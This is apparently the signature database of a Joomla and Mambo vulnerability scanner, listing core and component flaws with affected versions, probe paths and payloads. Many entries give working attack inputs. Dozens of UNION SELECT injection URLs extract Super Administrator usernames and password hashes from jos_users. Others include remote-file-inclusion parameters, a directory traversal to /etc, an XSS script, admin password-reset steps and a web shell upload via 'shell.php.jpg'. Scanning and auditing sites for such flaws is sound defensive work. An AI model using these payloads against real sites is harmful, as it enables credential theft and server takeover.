Generic: htaccess.txt has not been renamed. Versions Affected: Any|/htaccess.txt|Generic defenses implemented in .htaccess are not available, so exploitation is more likely to succeed.
Generic: Unprotected Administrator directory Versions Affected: Any|/administrator/|The default /administrator directory is detected. Attackers can brute-force administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Generic: Guessable Administrator directory Versions Affected: Any|/admin/|The guessable /admin directory is detected. Attackers can brute-force administrator accounts. How to protect: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Core: Multiple XSS/CSRF Vulnerability   Versions Affected: 1.5.9 <= |/?1.5.9-x|A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.  
Core: JSession SSL Session Disclosure Vulnerability Versions Affected: Joomla! 1.5.8 <= |/?1.5.8-x|When running a site under SSL (the entire site is forced to be under SSL), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Core: Frontend XSS Vulnerability Versions Affected: 1.5.10 <=|/?1.5.10-x|Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. A malicious normal admin can leverage it to gain access to super admin.
Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions Affected: 1.5.11 <=|/libraries/phpxmlrpc/xmlrpcs.php|/libraries/phpxmlrpc/xmlrpcs.php
Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions Affected: 1.5.12 <=|/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50x.php
Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions Affected: 1.5.11 <=|/?1.5.11-x-http_ref|An attacker can inject JavaScript or DHTML code that will be executed in the context of the targeted user's browser, allowing the attacker to steal cookies. The HTTP_REFERER variable is not properly parsed.
Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions Affected: 1.5.11 <=|/?1.5.11-x-php-s3lf|An attacker can inject JavaScript code in a URL that will be executed in the context of the targeted user's browser.
Core: Authentication Bypass Vulnerability Versions Affected: Joomla! 1.5.3 <=|/administrator/|Backend accepts any password for custom Super Administrator when LDAP is enabled
Core: Path Disclosure Vulnerability Versions Affected: Joomla! 1.5.3 <=|/?1.5.3-path-disclose|Crafted URL can disclose absolute path
Core: User redirected Spamming Vulnerability Versions Affected: Joomla! 1.5.3 <=|/?1.5.3-spam|User redirect spam
Core: joomla.php RFI Vulnerability Versions Affected: 1.0.0 |/includes/joomla.php|/includes/joomla.php?includepath=
Core: Admin Backend Cross Site Request Forgery Vulnerability Versions Affected: 1.0.13 <=|/administrator/|It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Core: Admin Backend Session Fixation SQL Injection Vulnerability Versions Affected: Joomla! 1.0.12 <=|/?j1012-fixate-session|It is possible to manipulate administrator interface cookies, which may be used to impersonate a legitimate user, allowing the attacker to view or alter user records, and to perform transactions as that user. The Cookie variable can be set to a malicious and arbitrary value, which can lead to session hijacking and privilege escalation attacks.
Core: Path Disclosure Vulnerability Versions Affected: Joomla! 1.5.12 <=|/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50x.php
CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability Versions Affected: Joomla! 1.5.8 <=|/plugins/editors/xstandard/attachmentlibrary.php|Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php
CoreLibrary: g_pcltar_lib_dir Remote File Inclusion Vulnerability Versions Affected: Joomla! 1.5.0 Beta|/libraries/pcl/pcltar.php|/libraries/pcl/pcltar.php?g_pcltar_lib_dir=
CoreTemplate: ja_purity XSS Vulnerability Versions Affected: 1.5.10 <=|/templates/ja_purity/|An XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions Affected: Joomla! 1.5.0 Beta/Stable|/libraries/phpmailer/phpmailer.php|N/A
CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions Affected: Joomla! 1.5.12 |/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/|While the Joomla! team announced only a File Upload vulnerability, there are in fact many. See: http://www.milw0rm.com/exploits/9296
CoreComponent: Joomla Remote Admin Password Change  Vulnerability  Versions Affected: 1.5.5 <= |/components/com_user/controller.php|1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password 
CoreComponent: com_content SQL Injection Vulnerability    Version Affected:  Joomla! 1.0.0  <= |/components/com_content/|/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
CoreComponent: com_search Remote Code Execution Vulnerability   Version Affected:  Joomla! 1.5.0 beta 2 <= |/components/com_search/|/index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
CoreComponent: com_admin    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_admin/admin.admin.html.php|/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
CoreComponent: com_admin    File Inclusion Vulnerability     Versions Affected: N/A|/administrator/components/com_admin/admin.admin.html.php|/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
CoreComponent: MailTo SQL Injection Vulnerability Versions Affected: N/A|/components/com_mailto/|/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
CoreComponent: com_content Blind SQL Injection Vulnerability Versions Affected: Joomla! 1.5.0 RC3|/components/com_content/|/index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
CoreComponent: com_content XSS Vulnerability    Version Affected:  Joomla!  1.5.7   <= |/components/com_content/|The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. 
CoreComponent: com_weblinks  XSS Vulnerability    Version Affected:   Joomla! 1.5.7   <= |/components/com_weblinks/|[Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). 
CoreComponent: com_mailto  Email Spam Vulnerability  Version Affected: Joomla!  1.5.6   <= |/components/com_mailto/|The mailto component does not verify validity of the URL prior to sending.
CoreComponent: com_content view=archive SQL Injection Vulnerability Versions Affected: Joomla! 1.5.0 Beta1/Beta2/RC1|/components/com_content/|Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <=|/components/com_content/|An XSS vulnerability exists in the category view of com_content.
CoreComponent: com_users XSS Vulnerability Version Affected: Joomla! 1.5.10 <=|/components/com_users/|An XSS vulnerability exists in the user view of com_users in the administrator panel.
CoreComponent: com_installer CSRF Vulnerability Versions Affected: Joomla! 1.5.0 Beta|/administrator/components/com_installer|N/A
CoreComponent: com_search Memory Consumption DoS Vulnerability Versions Affected: Joomla! 1.5.0 Beta|/components/com_search/|N/A
CoreComponent: com_poll (mosmsg) Memory Consumption DoS Vulnerability Versions Affected: 1.0.7 <=|/components/com_poll/|Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
CoreComponent: com_banners Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_banners/|/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
CoreComponent: com_mailto timeout Vulnerability Versions Affected: 1.5.13 <=|/components/com_mailto/|[Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Component: A6MamboCredits   File Inclusion Vulnerability  Versions Affected: Any|/components/com_a6mambocredits/|/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=
Component: A6MamboHelpDesk   File Inclusion Vulnerability  Versions Affected: Any |/components/com_a6mambohelpdesk/|/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
Component: Advanced Poll Versions Affected: 2.2.0 <= |/components/com_advancedpoll/|N/A
Component: Akocomment  SQL Injection Vulnerability  Versions Affected: Any |/components/com_akocomment/|Akocomment allows users to post comments to articles. $acname and $contentid are not sanitized and vulnerable. These correspond to hidden, value-prefilled FORM variables in the akocomment created html form.
Component: Article      File Inclusion Vulnerability    Versions Affected: 1.1 <= |/components/com_articles/|/classes/html/com_articles.php?absolute_path=
Component: ArtLinks File Inclusion Vulnerability    Versions Affected: Any|/components/com_artlinks/|/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
Component: MamCom (com_trade) Versions Affected: Any |/components/com_trade/|N/A
Component: Bayesian Naive Filter 	File Inclusion Vulnerability  Versions Affected: 1.1 <= |/components/com_bayesiannaivefilter/|/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
Component: BigApe Backup   File Inclusion Vulnerability    Versions Affected: <= |/components/com_babackup/|/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
Component: BSQ Site Stats  XSS + SQL Injection Vulnerabilities	 Versions Affected: 2.2.1 <= |/components/com_bsqsitestats/|1) Input passed via the "HTTP Referer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in context of an affected site when the site statistics are viewed.  2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  Successful exploitation requires that "magic_quotes_gpc" is disabled. 
Component: Car Manager  SQL Injection Vulnerability    Versions Affected: 1.1 <= |/components/com_resman/|/index.php?option=com_resman&task=moreinfo&id=-1+UNION+SELECT+111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Classifieds Versions Affected: 1.3 <= |/components/com_classifieds/|N/A
Component: Colophon  File Inclusion Vulnerability    Versions Affected: 1.2 <= |/components/com_colophon/|/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
Component: Community Builder  SQL Injection Vulnerability  Versions Affected: 1.0.0 <= |/components/com_profiler/|/index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Events Versions Affected: 1.3 Beta <= |/components/com_events/|N/A
Component: Expose Flash Gallery  Remote Permission Bypass/Arbitrary File Upload Vulnerability Versions Affected: RC4 <= |/components/com_expose/uploadimg.php|Upload shell.php.jpg to /components/com_expose/uploadimg.php or /administrator/com_expose/uploadimg.php. Check your shell at /components/com_expose/expose/img/shell.php.jpg or /administrator/...
Component: ExtCalendar  XSS Vulnerability	Versions Affected: 0.9.1 <= |/components/com_extcalendar/|1) Input passed to the "month", "year", "prev", and "next" parameters in calendar.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.  2) Input passed to the "Event title" field when adding a new event isn't properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed (e.g. when the administrator logs in).
Component: Facile Forms SQL Injection Vulnerability  Versions Affected: 1.4.6 <= |/components/com_facileforms/|/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Galleria   File Inclusion Vulnerability     Versions Affected: Any |/components/com_galleria/galleria.html.php|/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
Component: Gmaps    SQL Injection Vulnerability	   Versions Affected: 1.01 <= |/components/com_gmaps/|/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Hash Cash 	File Inclusion Vulnerability Versions Affected: Any |/components/com_hashcash/server.php|/components/com_hashcash/server.php?mosConfig_absolute_path=
Component: Hot Property Versions Affected: 0.97 <= |/components/com_hotproperty/|N/A
Component: JCE  XSS+File Inclusion Vulnerability	Versions Affected: 1.0.4<= |/components/com_jce/|1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.  2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. 
Component: JoomlaPack       File Inclusion Vulnerability     Versions Affected: 1.0.4a2 RE <= |/components/com_jpack/|/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
Component: JoomlaBoard     File Inclusion Vulnerability   	Versions Affected: 1.1.1 <= |/components/com_joomlaboard/|/components/com_joomlaboard/file_upload.php?sbp=
Component: JoomlaLib Versions Affected: 1.2.1 <= |/components/com_joomlalib/|N/A
Component: JD-WordPress Versions Affected: 1.0 RC2 <= |/components/com_jd-wp/|N/A
Component: Fundraiser Versions Affected: 0.0.0 <= |/components/com_fundraiser/|N/A
Component: Marketplace    SQL Injection Vulnerability	Versions Affected: 1.1.1-pl1 <= |/components/com_marketplace/|/index.php?option=com_marketplace&page=show_category&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: NeoReferences 	  SQL Injection Vulnerability  Versions Affected: 1.3.1 <= |/components/com_neoreferences/|/index.php?option=com_neoreferences&Itemid=27&catid=99887766+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+where+user_id=1=1--
Component: CHRONOContact File Inclusion Vulnerability Versions Affected: N/A|/components/com_chronocontact/excelwriter/PPS/File.php|/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
Component: MamboSPGM Versions Affected: 1.4.1 <= |/components/com_mambospgm/|N/A
Component: Ajax Chat Versions Affected: 1.0.1 <= |/components/com_ajaxchat/|N/A
Component: Joomla Cloner Versions Affected: 1.6.1 <= |/components/com_cloner/|N/A
Component: Quiz   SQL Injection Vulnerability 	Versions Affected: 0.81 <= |/components/com_quiz/|/index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: MCQuiz    SQL Injection Vulnerability	Versions Affected: 0.9 <= |/components/com_mcquiz/|/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=42&tid=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: paxxgallery    Blind SQL Injection  Vulnerability Versions Affected: 0.2 <= |/components/com_paxxgallery/|/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=1+and+1=1::/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=1+and+1=2
Component: pcchess   File Inclusion Vulnerability	Versions Affected: 0.8 <= |/components/com_pcchess/include.pcchess.php|/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
Component: xfaq 	SQL Injection Vulnerability Versions Affected: 1.2 <= |/components/com_xfaq/|/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: rapidrecipe SQL injection Vulnerability	Versions Affected: 1.6.5 <= |/components/com_rapidrecipe/|/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_doc SQL Injection Vulnerability Versions Affected: Any |/components/com_doc/|/index.php?option=com_doc&task=view&sid=-1+UNION+SELECT+1,1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,5,6,7,8,password,username,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Unknown name: com_noticias   SQL Injection Vulnerability 	Versions Affected: Any |/components/com_noticias/|index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766+UNION++SELECT+0,concat(username,0x3a,password,0x3a,email),2,3,4,5++FROM++jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: NeoGallery   SQL Injection Vulnerability	Versions Affected: Any |/components/com_neogallery/|/index.php?option=com_neogallery&task=show&Itemid=5&catid=999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Ynews 	  SQL Injection Vulnerability	Versions Affected: 1.0.0 <= |/components/com_ynews/|/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+UNION+SELECT+0,1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: jooget   SQL Injection Vulnerability 	Versions Affected: 2.6.8 <= |/components/com_jooget/|/index.php?option=com_jooget&Itemid=61&task=detail&id=-1+UNION+SELECT+0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: MediaSlide Blind SQL Injection Vulnerability Versions Affected: 0.5.0 <= |/components/com_mediaslide/|/index.php?option=com_mediaslide&act=contact&id=1&albumnum=1+and+1=1::/index.php?option=com_mediaslide&act=contact&id=1&albumnum=1+and+1=2
Component: Rssxt  RFI Vulnerability Versions Affected: 1.0 <= |/components/com_rssxt/|/components/com_rssxt/rssxt.php?mosConfig_absolute_path=
Component: D4JeZine Versions Affected: 2.8 <= |/components/com_ezine/|N/A
Component: ProductShowcase SQL Injection Vulnerability Versions Affected: 1.5 <= |/components/com_productshowcase/|/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Candle	 SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_candle/|/index.php?option=com_candle&task=content&cID=-9999+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: simple shop  SQL Injection Vulnerability Versions Affected: 2.0 <= |/components/com_simpleshop/|/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: hwdVideoShare SQL Injection Vulnerability Versions Affected: 1.1.1 <= |/components/com_hwdvideoshare/|/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999+UNION+SELECT+000,111,222,333,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Clasifier  SQL Injection Vulnerability Versions Affected: 0.9 <= |/components/com_clasifier/|/index.php?option=com_clasifier&Itemid=61&cat_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PC CookBook   SQL Injection Vulnerability 	Versions Affected: 1.3 <= |/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: astatsPRO   SQL Injection Vulnerability	Versions Affected: 1.0.0 <= |/components/com_astatspro/|/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: com_galeria   SQL Injection Vulnerability 	Versions Affected: Any|/components/com_galeria/|/index.php?option=com_galeria&Itemid=61&func=detail&id=-999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,7+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Limbo File Manager com_fm RFI Vulnerability  Versions Affected: 1.0.4 <= |/components/com_fm/fm.install.php|/components/com_fm/fm.install.php?lm_absolute_path=
Component: Serverstat 	  File Inclusion Vulnerability	 Versions Affected: 0.4.4 <= |/components/com_serverstat/install.serverstat.php|/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Component: Com Profiler Blind SQL Injection	Vulnerability Versions Affected: 1.0 RC2 <=|/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Component: Crop Image  File Inclusion Vulnerability 	Versions Affected: 1.0 <= |/components/com_cropimage/admin.cropcanvas.php|/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Component: Mambatstaff    File Inclusion Vulnerability   Versions Affected: 3.1b <= |/components/com_mambatstaff/mambatstaff.php|/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
Component: Loudmouth Versions Affected: 4.0 j <= |/components/com_loudmouth/|N/A
Component: PhpBB RFI Vulnerability Versions Affected: 1.2.4RC3 <= |/components/com_forum/|/components/com_forum/download.php?phpbb_root_path=
Component: Kochsuite File Inclusion Vulnerability Versions Affected: 0.9.4 <= |/components/com_kochsuite/|/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
Component: Remository   File Inclusion Vulnerability		Versions Affected: 3.25 <= |/components/com_remository/admin.remository.php|/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Component: Tosmo Mambo RFI Vulnerability Versions Affected: 4.0.13a <= |/components/com_minibb/|/components/minibb/index.php?absolute_path=
Component: Mam - Moodle 	  File Inclusion Vulnerability   Versions Affected: Any|/components/com_moodle/moodle.php|/components/com_moodle/moodle.php?mosConfig_absolute_path=
Component: Coppermine Photo Gallery 	  File Inclusion Vulnerability	 Versions Affected: 1.0 <= |/components/com_cpg/cpg.php|/components/com_cpg/cpg.php?mosConfig_absolute_path=
Component: Php Shop 	  File Inclusion Vulnerability	 Versions Affected: 1.2 RC2b <= |/components/com_phpshop/toolbar.phpshop.html.php|/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
Component: MamboWiki      File Inclusion Vulnerability	Versions Affected: 0.9.6 <= |/components/com_mambowiki/MamboLogin.php|/components/com_mambowiki/MamboLogin.php?IP=
Component: Lurm Constructor   File Inclusion Vulnerability	Versions Affected: 0.6b <= |/components/com_lurm_constructor/admin.lurm_constructor.php|/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
Component: FlippingBook SQL Injection Vulnerability Versions Affected: 1.0.4 <= |/components/com_flippingbook/|/index.php?option=com_flippingbook&Itemid=28&book_id=999+UNION+SELECT+null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/components/com_extplorer/|/index.php?com_extplorer-test1
Component: joomlaXplorer Local Directory Traversal  Vulnerability Versions Affected: 1.6.2 <= |/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
Component: joomlaXplorer XSS Vulnerability Versions Affected: 1.6.2 <= |/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Component: Online FlashQuiz   Remote File Inclusion Vulnerability Versions Affected: 1.0.2 <= |/components/com_onlineflashquiz/|/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
Component: actualite   SQL Injection 	Vulnerability Versions Affected: 1.0 <= |/components/com_actualite/|/index.php?option=com_actualite&task=edit&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: myalbum  SQL Injection Vulnerability Versions Affected: 1.0 <= |/components/com_myalbum/|/index.php?option=com_myalbum&album=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3,4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: alphacontent   SQL Injection  Vulnerability  Versions Affected: 2.5.8 <= |/components/com_alphacontent/|/index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999+UNION+SELECT+1,concat(username,0x3e,password),3,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,39+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Cinema SQL Injection Vulnerability  	Versions Affected: 1.0 <= |/components/com_cinema/|/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999+UNION+SELECT+0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: D3000 	SQL Injection Vulnerability  Versions Affected: 1.0.0 <= |/components/com_d3000/|/index.php?option=com_d3000&task=showarticles&id=-99999+UNION+SELECT+0,username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: rekry 	SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_rekry/|/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+limit+1,1--
Component: custompages Remote File Inclusion Vulnerability  Versions Affected: 1.1 <= |/components/com_custompages/|/index.php?option=com_custompages&cpage=
Component: Restaurante  File Upload Vulnerability   Versions Affected: 1.0 <= |/components/com_restaurante/|/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Alberghi  SQL Injection Vulnerability Versions Affected: 2.1.3 <= |/components/com_alberghi/|/index.php?option=com_alberghi&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: joovideo   SQL Injection	Vulnerability Versions Affected: 1.2.2 <= |/components/com_joovideo/|/index.php?option=com_joovideo&Itemid=1&task=detail&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Acajoom  SQL Injection Vulnerability  Versions Affected: 1.1.5 <= |/components/com_acajoom/|/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+LIMIT+1,1--
Component: jReviews RFI Vulnerability Versions Affected: Any |/components/com_jreviews/scripts/xajax.inc.php|/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=
